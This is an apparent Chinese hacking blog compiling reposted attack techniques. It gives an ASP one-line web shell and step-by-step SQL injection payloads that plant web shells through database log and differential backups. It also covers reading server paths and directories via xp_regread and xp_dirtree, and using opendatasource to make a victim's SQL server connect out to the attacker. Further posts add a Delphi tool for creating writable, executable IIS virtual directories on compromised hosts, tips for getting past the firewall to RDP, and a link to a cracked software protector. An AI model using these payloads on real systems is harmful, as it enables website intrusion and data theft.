Chinadu`s Blog

官方下载地址：
http://download.microsoft.com/download/8/c/9/8c968ecc-8402-49f3-aacb-dc4c5d230a9a/directx_dec2006_redist.exe

韩国高清晰MV集合 需要eMule下载：
http://p2p.uying.com/html/20060929/23244616178.stm

来源：9xi4o's blog

后台填加 gif|jpg|png|bmp|rar|zip|swf|doc|aaaspspaspsp
目录限制执行脚本，改上传文件夹为inc
顺利拿到shell

话说一SB在论坛上发了个 威金的demo版下载者 加了个广告程序打开他的网站 人家问他释放出来的隐藏文件是干什么的。他鸡鸡歪歪了半天 目的为了掩饰自己的无知..
个性签名是他长的比周润发还帅等等之类不要脸的话
哎...SB年年有 今年特别多

·判断用户是否是共享上网


　　ADSL共享上网有两种方式，一种是代理，一种是地址翻译（NAT），大家常说的路由方式其实就是NAT方式，其实路由和NAT的原理还是有区别的，这里不作讨论，现在的ADSL猫一般都有NAT的功能，用它本身的功能实现共享上网是比经济方便，本文主要讨论这种方式。

　　要想阻断一台以上的计算机上网必须能发现共享后边的机器是否多于一台，NAT的工作原理如图一所示，经过NAT转换后访问外网的内网的计算机的地址都变成了192.168.0.1而且MAC地址也转换成了ADSL的MAC地址，也就是说，从原理上讲，直接在ADSL出口抓经过NAT转换的包是不能发现到底有几台机器在上网。那是如何发现的呢？经过研究发现它是采用多种方法探测用户是否用共享方式上网，从而进行限制，下面分别进行破解：

一、检查同一IP地址的数据包中是否有不同的MAC地址，如果是，则判定用户共享上网

　　破解的办法是把每台机的MAC地址改为一样。修改的方法如下:

　　首先要获取本机的MAC：MAC地址是固化在网卡上串行EEPROM中的物理地址，通常有48位长。以太网交换机根据某条信息包头中的MAC源地址和MAC目的地址实现包的交换和传递。

　　在Windows 2000/XP中，依次单击“开始”→“运行”→输入“CMD”，回车后输入“ipconfig /all”→回车。或者右键本地连接图标、选择状态然后点击支持选项卡，这里“详细信息”中包含有MAC和其它重要网络参数。

　　1.如果你的网卡驱动有直接提供克隆MAC地址功能，如RealTek公司出的RTL8139芯片，那恭喜你了，点击“开始→设置→控制面板”，双击“网络和拨号连接”，右键点击需要修改MAC地址的网卡图标，并选择“属性”。

　　在“常规”选项卡中，点击“配置”按钮，点击“高级”选项卡。在“属性” 区，你应该可以看到一个称作“Network Address”或“Locally Administered Address”的项目，点击它，在右侧“值”的下方，输入你要指定的MAC地址值。要连续输入12个数字或字母，不要在其间输入“-”。重新启动一次系统后设置就会生效了（Windows 98和Windows 2000/XP用户操作略有区别，请参照系统说明操作）

　　2.以Windows XP系统为例，如果你的网卡驱动没有提供克隆MAC地址功能，请按如下的方法：

　　大部分网卡都可以通过在控制面板中修改网卡属性来更改其MAC地址。在“设备管理器中”，右键点击需要修改MAC地址的网卡图标，并选择“属性/ 高级”选项卡。在“属性”区，就可以看到一个称作“Network Address”或其他相类似名字的的项目，点击它，在右侧“值”的下方，输入要指定的MAC地址值。要连续输入12个十六进制数字或字母，不要在其间输入“-”。

　　另外有几个可以修改MAC的软件都可以在Windows XP/2000下运行，所以这里就不详细介绍了

　　小贴士：
　　如果你想把网卡的MAC地址恢复原样，只要再次把“Network Address”项右边的单选项选择为下面一个“没有显示”再重新启动即可（Windows 2000是“不存在”）。

Windows 软件高级保护系统：Themida v1.7.3.0 授权版+汉化点击下载

解压密码：ExpCode.com

ps:世界上最好的商业软件保护壳

刚刚装好,有点不习惯.呵呵.
下面是官方的下载地址:
http://download.microsoft.com/download/4/1/8/418981A4-6EF9-4DE6-BEFC-1A53E886CB62/ie7-windowsxp-x86-chs.exe

来源：s0n9 '5 b109

<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

1.InjectionURL';alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)

2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)

3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init-- (减少备分数据的大小)

4.InjectionURL';insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')-- (插入一句话木马)

5.InjectionURL';backup log XXX to disk = 'd:\chinakm\test.asp'-- (备分日志到WEB路径）

6.InjectionURL';drop table cmd-- （删除新建的cmd表）

7.InjectionURL';alter database XXX set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

注：InjectionURL是注入点，XXX是数据库名称.

附上DB_ONER权限HACK的其他技巧,希望对菜菜有所帮助,高手略过.

数据库差异备份代码：

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创建一个表

2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库，@s为备份名称(jmdcw的16进制转换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中

4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\hsqq.asp' backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差异备份，备份的保存路径暂定为C盘目录，文件名为hsqq.asp。

5、drop table [jm_tmp]-- 删除此表。

网站物理路径读取代码：

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表

2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/'-- 将网站目录插到表字段中

3、and (select top 1 cast([data] as nvarchar(4000)+char(124) from [jm_tmp] order by [data] desc)=0 '//暴出字段

4、drop table [jm_tmp]-- 删除此表。

磁盘目录读取代码：

1、drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)-- 创建表

2、delete [jm_tmp];insert [jm_tmp] exec master..xp_dirtree 'C:\',1,1-- 将C盘的文件夹及文件插入到表中

3、 and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top 1 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第一个文件夹名称

4、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top 2 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第二个文件夹名称

5、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top X [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第X个文件夹或文件名称

6、drop table [jm_tmp]--删除此表

网站物理路径读取代码：

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表

2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/'-- 将网站目录插到表字段中

3、and (select top 1 cast([data] as nvarchar(4000)+char(124) from [jm_tmp] order by [data] desc)=0 '//暴出字段

4、drop table [jm_tmp]-- 删除此表。

注射过程中DB_ONER权限并且主机与数据库不在一起的搞法

其实.即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般服务器装好系统什么的.都会装个IIS吧？列他C盘.看看有没有Inetpub 这个目录.就知道他有没有装IIS了.但是.不知道他IP也？怎么办呢？可以这样来，PING一下WEB服务器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢？可以利用opendatasource宏让对方的 SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须要有公网 IP.而且开放的1433端口要保证能被外网访问到.好.条件满足.就开始做吧！

我现在搞的这站.100%数据和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这数据库服务器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入
create database hack520 create TABLE zhu(name nvarchar(256) null);create TABLE J8(id int NULL,name nvarchar(256) null); 点执行.

建立了一个hack520的库名.和zhu J8两个表.zhu里面有name这一个字段.J8也放了两字段名.一个是id一个是name.好了.现在就可以开始建立连接了~~~~~~~先看一下这条SQL语句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用户;pwd=SQL密码;database=建立的库名') .库名.表名 '执行的语句' 恩现在开始吧...

http://www.xxx.com/news.asp?id=126'inser ... asource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

在IE上执行咯.呵呵这个时候对方就会连接到我机器的SQL服务器.不信？netstat -an看一下

在CMD下输入命令：
netstat -an | find "1433"

文章作者：臭要饭的!

很久，很久没有和大家聊天了，很想大家的。见面先就给大家送个小礼吧。其实也不是什么好东西。
在研究和学习中进步，没有研究，没有深入的去了解，就没有进步。认真的学习态度+穷追不舍+十万个为什么。
得到的结果就是成就！
好了，屁话放了太多了。明白的人，不看上面的话都明白。不明白的人，看了也许永远也不会明白。

系统中有个VBS也可以实现这样的功能的。不过我认为，如果在台虚拟主机中，存在多个网站的情况下。
建立虚拟目录，也只能在第一个默认的站点中。一般情况下虚拟主机默认是关掉的。也就是你建好了，通过HTTP也不能访问。
从MSDN中，我找到了一些相关的技术资料，写了个小工具。可以建立在其它站点中。这里看来说起来有点混乱。

我举例给大家说说吧。
拿个虚拟主机的 Internet 信息服务中的列表给大家看看就明白了

+默认 web 站点(已停止)
+管理 web 站点(已停止)
+163.com
+263.com
+363.com

好，上面大家看到了，有三个站点是开放的。而前面那个默认的已经被关闭了。
这时，我们用VBS建立虚拟目录，是建立在默认的站点中，而站点被停止了，所以建立成功后，也不能访问。
比如：我们怎么能在263.com这个站中，建立一个目录，比如:VDIR,通过http://www.163.com/VDIR就可以访问了呢？
通过查找资料，我得到了，在建立的时候，允许指定一个序号，比如：1..N

1 : 表示，在默认的站点中，然后按着这个顺序来，而363.com对应的序号就是5.
明白了这个道理后，用程序来实现这个功能就比较简单了。当然，你会说，那么我想在263.com这个站中，建立。
但是我不知道，这个站对应的序号是多少，对于这个问题，我们只能从序号3开始一直往下建立，(1,2对应的是前面默认的)
当建立一个后，可以读出他的配置信息，返回给大家。建一个后，你就明白是不是建立在你想要建的那个站中，如果不是。
也可以把他删掉。再增加序号。：）（有没有一个工具，可以在命令行下，实现把所有的主机站点信息，比如:名称，对应目录之类的列出来?原理差不多，你看完代码应该会写了）

以下是代码:
program VDir;

{$APPTYPE CONSOLE}

uses
ActiveX,SysUtils,ComObj;
Var
VName,
VPath,
Vattrib : String;

createVpath : Boolean;
WebIndex : integer;

Procedure ShowHelp;
Begin
WriteLn('=========== VDir by CYFD! ============');
WriteLn('');
WriteLn('Useag:'+ParamStr(0)+' <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]');
WriteLn('');
WriteLn('Sample:'+ParamStr(0)+' -n:yfd -p:c:\ -i:1 -c:1 -r:0,1,3');
WriteLn('');
WriteLn(' CmdType :');
WriteLn(' 1 : create');
WriteLn(' 0 : delete');
WriteLn(' Vattrib :');
WriteLn(' 0 : AccessScript');
WriteLn(' 1 : AccessRead');
WriteLn(' 2 : AccessWrite');
WriteLn(' 3 : AccessExecute');
WriteLn(' 4 : EnableDirBrowsing');
End;

Procedure ParseParam(Str : String);
var
tStr : String;
Begin
tStr := lowercase(Copy(Str,1,3));
if tStr='-n:' then
VName := Copy(Str,4,Length(Str));
if tStr='-p:' then
VPath := Copy(Str,4,Length(Str));
if tStr='-c:' then
createVpath := StrToIntDef(Copy(Str,4,Length(Str)),1) = 1;
if tStr='-r:' then
Vattrib := Copy(Str,4,Length(Str));
if tStr='-i:' then
WebIndex := StrToIntDef(Copy(Str,4,Length(Str)),1);

End;

Function GetStrForSpace(SourceStr :String ; JGZF:char ; Index:integer):String;
var
Pchar1 : pchar;
i , count : integer;
cStr : string;
begin
Count := 0;
Pchar1 := pchar(SourceStr);
cStr := '';
for i:=0 to length(Pchar1)-1 do begin
if pchar1 = JGZF then
begin
Count := Count + 1;
if Count = Index then begin
break;
end;
end
else if Count = Index -1 then cStr := cStr + pchar1;
end;
Result := cStr;
end;

procedure createVDir(Vdirpath:string);
var
WebSite, WebServer, WebRoot, VDir,Binds: Variant;
BindStr : String;
begin
Try
WebSite := createOleObject('IISNamespace');
WebSite := WebSite.GetObject('IIsWebService', 'localhost/w3svc');
WebServer := WebSite.GetObject('IIsWebServer', IntTostr(WebIndex));

// 这里的WebIndex就是你要建立的序号.

WebRoot := WebServer.GetObject('IIsWebVirtualDir', 'Root');

if createVpath then Begin
VDir := WebRoot.create('IIsWebVirtualDir', VName);
Vdir.AccessScript := pos(',0,',Vattrib) >0;
VDir.AccessRead := pos(',1,',Vattrib) >0;
VDir.AccessWrite := pos(',2,',Vattrib) >0;
VDir.AccessExecute := pos(',3,',Vattrib) >0;
VDir.EnableDirBrowsing := pos(',4,',Vattrib) >0;

// 以上几行是为你建立的目录设访问权限。可写，可读，可执行，可流览...

VDir.Path :=VDirPath;
VDir.SetInfo;

Binds := WebServer.ServerBindings;
BindStr := Binds[0]+':';
WriteLn('');
WriteLn('Result :');
WriteLn('');
WriteLn('IP : '+ GetStrForSpace(BindStr,':',1));
WriteLn('Port : '+ GetStrForSpace(BindStr,':',2));
WriteLn('HostName : '+ GetStrForSpace(BindStr,':',3));
WriteLn('');
WriteLN('Path Is: ' + WebRoot.Path);
WriteLN('Index IS: ' + IntTostr(WebIndex));
WriteLn('Comment : ' + WebServer.ServerComment);

// 上面几行就是得到站点的一些信息，IP，端口，主机名，路径，等等..

WriteLn('');
WriteLn('create success.');
End
Else Begin
WebRoot.delete('IIsWebVirtualDir', VName);
Writeln('delete Success.');
End;
Except
WriteLn('Fail.');
End;

end;

Var
i : integer;
begin

coinitialize(nil);
if ParamCount <4 then Begin
ShowHelp;
Exit;
End;

For i:=1 to ParamCount do
ParseParam(Paramstr(i));

if (ParamCount = 5) and (Vattrib ='') then Begin
ShowHelp;
Exit;
End;
Vattrib := ','+Vattrib+',';
createVDir(VPath);

{ TODO -oUser -cConsole Main : insert code here }

end.
代码可以用COPY到记事本中，然后保存为VDIR.DPR 文件，用DELPHI打开编译一下就行了。

使用方法:
我要在默认站点(序号为1)中建立一个，可读，可写，可注浏览的目录，名称为: yfd 路径为c:
那么这么使用:

D:VDir.exe -n:yfd -p:c: -i:1 -c:1 -r:1,2,4

程序帮助显示:
Useag:VDir.exe <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]

Sample:D:VDir.exe -n:yfd -p:c: -i:1 -c:1 -r:0,1,3

CmdType :
1 : create
0 : delete
Vattrib :

0 : AccessScript (脚本访问)
1 : AccessRead (可读)
2 : AccessWrite (可写)
3 : AccessExecute (可执行)
4 : EnableDirBrowsing (可浏览)

-n: 建立的目录名称

-P: 建立的目录路径

-i: 序号

-c: (1表示建立,0表示删除)

-r: (当选择建立的时候,请输入他相应的访问权限值,删除的时候可以不写).

返回结果:

D:>VDir.exe -n:yfd -p:c: -i:1 -c:1 -r:1,2,4

Result :

IP : 127.0.0.1
Port : 80
HostName :

Path Is: E:ScriptWEBTEST
Index IS: 1
Comment : 默认 Web 站点

create success.

现在越来越多的服务器用的是ICS防火墙，配合ipsec来管理远程登陆和端口安全
搞的真是要天下无黑了
很多服务器直接打下来却连不上3389，仔细分析完也没找到什么防火墙或者新鲜软件，ipsec服务关闭以后也没效果。着实郁闷了一翻
想一想就是自带ICS搞的鬼吧

服务中显示：
Windows Firewall/Internet Connection Sharing (ICS)
我们可以用
net stop "Windows Firewall/Internet Connection Sharing (ICS)"直接关闭，但是并未给提示，而且也没有起到效果，3389依然连接不上
net start之时却提示服务启动~~~郁闷ing
请教n多朋友,有的说停止服务，有的说kill进程，均告失败。终于在俺哥那里找到了答案，现分享出来
C:\>netsh
netsh>firewall
netsh firewall>show

下列指令有效:

命令从 netsh 上下文继承:
show alias - 列出所有定义过的别名。
show helper - 请列出所有头等助手。
show mode - 显示当前的模式。

此上下文中的命令:
show allowedprogram - 显示防火墙允许的程序配置。
show config - 显示防火墙配置。
show currentprofile - 显示当前防火墙配置文件。
show icmpsetting - 显示防火墙 ICMP 配置。
show logging - 显示防火墙记录配置。
show multicastbroadcastresponse - 显示防火墙多播/广播响应配置。
show notifications - 显示防火墙操作配置。
show opmode - 显示防火墙端口配置。
show portopening - 显示防火墙端口配置。
show service - 显示防火墙服务配置。
show state - 显示当前防火墙状态。